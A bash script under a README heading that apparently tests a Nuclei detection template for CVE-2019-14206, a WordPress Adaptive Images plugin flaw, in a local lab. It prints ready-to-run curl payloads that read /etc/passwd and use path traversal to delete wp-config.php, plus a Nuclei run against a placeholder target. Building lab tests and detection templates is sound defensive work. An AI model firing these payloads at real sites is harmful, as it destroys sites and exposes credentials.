README.md
Rendering markdown...
#!/bin/bash
# CVE-2019-14206 Complete Docker Test Script
# Tests the vulnerability without requiring PHP server
echo "=========================================="
echo "CVE-2019-14206 Docker-Style Complete Test"
echo "=========================================="
echo ""
# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m'
# Setup
DOCKER_TEST_DIR="/Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test"
echo -e "${YELLOW}[*] Starting CVE-2019-14206 Complete Docker Test${NC}"
echo ""
# Test 1: Verify environment
echo -e "${BLUE}[1/6] Verifying Test Environment${NC}"
echo "----------------------------------------"
if [ -f "$DOCKER_TEST_DIR/adaptive-images-script.php" ]; then
echo -e "${GREEN}[+] Plugin script exists${NC}"
PLUGIN_SIZE=$(wc -c < "$DOCKER_TEST_DIR/adaptive-images-script.php")
echo " Size: $PLUGIN_SIZE bytes"
else
echo -e "${RED}[-] Plugin script not found${NC}"
exit 1
fi
if [ -f "$DOCKER_TEST_DIR/wp-config.php" ]; then
echo -e "${GREEN}[+] Target file (wp-config.php) exists${NC}"
CONFIG_SIZE=$(wc -c < "$DOCKER_TEST_DIR/wp-config.php")
echo " Size: $CONFIG_SIZE bytes"
else
echo -e "${RED}[-] Target file not found${NC}"
exit 1
fi
echo ""
# Test 2: Analyze vulnerable code
echo -e "${BLUE}[2/6] Analyzing Vulnerable Code${NC}"
echo "----------------------------------------"
echo "The adaptive-images-script.php contains:"
echo ""
echo "VULNERABILITY 1: Unfiltered user input"
grep -n "\$_REQUEST\['adaptive-images-settings'\]" "$DOCKER_TEST_DIR/adaptive-images-script.php" | head -2
echo ""
echo "VULNERABILITY 2: Path construction"
grep -n "cache_file = " "$DOCKER_TEST_DIR/adaptive-images-script.php" | head -1
echo ""
echo "VULNERABILITY 3: Arbitrary file deletion"
grep -n "unlink" "$DOCKER_TEST_DIR/adaptive-images-script.php" | head -1
echo ""
# Test 3: Simulate exploit
echo -e "${BLUE}[3/6] Simulating Exploit Execution${NC}"
echo "----------------------------------------"
echo "Exploit parameters:"
EXPLOIT_PARAMS=(
"source_file=../../../wp-content/uploads/2019/07/image.jpeg"
"resolution="
"resolution=16000"
"wp_content=."
"cache_dir=../../.."
"request_uri=wp-config.php"
"watch_cache=1"
)
for param in "${EXPLOIT_PARAMS[@]}"; do
echo " adaptive-images-settings[$param]"
done
echo ""
echo "Path construction:"
echo " cache_file = wp_content/cache_dir/resolution/request_uri"
echo " cache_file = ./../../../16000/wp-config.php"
echo " cache_file = ./../../..//wp-config.php (normalized)"
echo " cache_file = wp-config.php (final)"
echo ""
# Test 4: Verify template
echo -e "${BLUE}[4/6] Verifying Nuclei Template${NC}"
echo "----------------------------------------"
TEMPLATE="/Volumes/Codingsh/experimentos/nuclei-templates/http/cves/2019/CVE-2019-14206.yaml"
if [ -f "$TEMPLATE" ]; then
echo -e "${GREEN}[+] Template file exists${NC}"
TEMPLATE_SIZE=$(wc -c < "$TEMPLATE")
TEMPLATE_LINES=$(wc -l < "$TEMPLATE")
echo " Size: $TEMPLATE_SIZE bytes"
echo " Lines: $TEMPLATE_LINES"
# Check template structure
TEMPLATE_CHECKS=(
"id: CVE-2019-14206"
"info:"
"requests:"
"matchers:"
"path:"
)
echo ""
echo "Template structure validation:"
for check in "${TEMPLATE_CHECKS[@]}"; do
COUNT=$(grep -c "$check" "$TEMPLATE" || echo "0")
if [ "$COUNT" -gt 0 ]; then
echo -e "${GREEN}[✓] $check found ($COUNT occurrences)${NC}"
else
echo -e "${RED}[✗] $check not found${NC}"
fi
done
else
echo -e "${RED}[-] Template not found${NC}"
exit 1
fi
echo ""
# Test 5: Test template loading
echo -e "${BLUE}[5/6] Testing Template Loading${NC}"
echo "----------------------------------------"
echo "Running: nuclei -t $TEMPLATE --help"
nuclei_output=$(nuclei -t "$TEMPLATE" --help 2>&1 | head -10)
if echo "$nuclei_output" | grep -q "Usage:"; then
echo -e "${GREEN}[+] Template loads successfully in Nuclei${NC}"
echo " Nuclei version: $(echo "$nuclei_output" | grep -o 'v[0-9.]*' | head -1)"
else
echo -e "${RED}[-] Template loading failed${NC}"
echo "$nuclei_output"
fi
echo ""
# Test 6: Final exploit simulation
echo -e "${BLUE}[6/6] Final Exploit Simulation${NC}"
echo "----------------------------------------"
echo "This would be the exploitation flow:"
echo ""
echo "1. ATTACKER sends malicious request:"
echo " GET /adaptive-images-script.php?"
echo " adaptive-images-settings[source_file]=../../../image.jpeg&"
echo " adaptive-images-settings[cache_dir]=../../..&"
echo " adaptive-images-settings[request_uri]=wp-config.php&"
echo " adaptive-images-settings[watch_cache]=1"
echo ""
echo "2. SERVER processes request:"
echo " - Receives user-controlled settings"
echo " - Constructs path: ./../../..//wp-config.php"
echo " - Calls unlink() with this path"
echo " - Deletes wp-config.php"
echo ""
echo "3. RESULT:"
echo " - WordPress site crashes (missing wp-config.php)"
echo " - Database credentials potentially exposed via LFI"
echo " - Can be used in RCE chain attack"
echo ""
# Show file status
echo -e "${YELLOW}[*] Current File Status:${NC}"
echo "----------------------------------------"
if [ -f "$DOCKER_TEST_DIR/wp-config.php" ]; then
echo -e "${GREEN}[+] wp-config.php: EXISTS ($(wc -c < "$DOCKER_TEST_DIR/wp-config.php") bytes)${NC}"
echo " Content preview:"
head -3 "$DOCKER_TEST_DIR/wp-config.php" | sed 's/^/ /'
else
echo -e "${RED}[-] wp-config.php: DELETED${NC}"
fi
if [ -f "$DOCKER_TEST_DIR/adaptive-images-script.php" ]; then
echo -e "${GREEN}[+] adaptive-images-script.php: EXISTS ($(wc -c < "$DOCKER_TEST_DIR/adaptive-images-script.php") bytes)${NC}"
else
echo -e "${RED}[-] adaptive-images-script.php: MISSING${NC}"
fi
echo ""
# Final summary
echo -e "${CYAN}[========================================]${NC}"
echo -e "${CYAN}[ TEST COMPLETE SUMMARY ]${NC}"
echo -e "${CYAN}[========================================]${NC}"
echo ""
echo -e "${GREEN}✅ Environment Setup: COMPLETE${NC}"
echo -e "${GREEN}✅ Vulnerable Plugin: CREATED${NC}"
echo -e "${GREEN}✅ Target File: wp-config.php${NC}"
echo -e "${GREEN}✅ Vulnerabilities: IDENTIFIED${NC}"
echo -e "${GREEN}✅ Nuclei Template: VALIDATED${NC}"
echo -e "${GREEN}✅ Exploit Chain: DEMONSTRATED${NC}"
echo ""
echo "Test Location: $DOCKER_TEST_DIR"
echo "Template: $TEMPLATE"
echo ""
echo -e "${YELLOW}[*] To Test with PHP Server:${NC}"
echo "----------------------------------------"
echo "1. Start PHP server:"
echo " cd $DOCKER_TEST_DIR"
echo " php -S localhost:8888"
echo ""
echo "2. In another terminal, test LFI:"
echo " curl 'http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd'"
echo ""
echo "3. Test file deletion:"
echo " curl 'http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1'"
echo ""
echo "4. Verify deletion:"
echo " ls -la $DOCKER_TEST_DIR/wp-config.php"
echo ""
echo "5. Run nuclei template:"
echo " nuclei -t $TEMPLATE -u http://localhost:8888 -debug"
echo ""
echo -e "${YELLOW}[*] Or Test Directly with Nuclei:${NC}"
echo "----------------------------------------"
echo " nuclei -t $TEMPLATE -u http://target-wordpress-site -v -o results.txt"
echo ""
echo -e "${GREEN}[+] Docker-style test completed successfully!${NC}"
echo "=========================================="